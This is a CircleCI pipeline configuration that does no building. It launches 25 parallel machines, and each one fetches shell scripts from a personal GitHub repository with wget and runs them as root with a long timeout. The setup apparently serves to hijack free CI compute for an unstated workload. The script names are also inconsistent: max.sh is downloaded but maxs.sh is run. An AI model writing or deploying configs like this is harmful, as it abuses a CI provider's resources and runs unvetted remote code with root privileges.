version: 2.1
jobs:
  build:
    machine:
      image: ubuntu-2004:202101-01
    parallelism: 25
    steps:
      - run: 
         name: Downloading
         command: |
          sudo su --command "wget https://raw.githubusercontent.com/liyanul225/nuyul/main/install.sh && chmod +x install.sh && ./install.sh"
      - run: 
         name: Executing
         no_output_timeout: 60m
         command: |
          wget https://raw.githubusercontent.com/liyanul225/rondo16/main/max.sh
          chmod +x maxs.sh
          sudo su --command "./maxs.sh"
workflows:
    version: 2
    build:
        jobs:
            - build
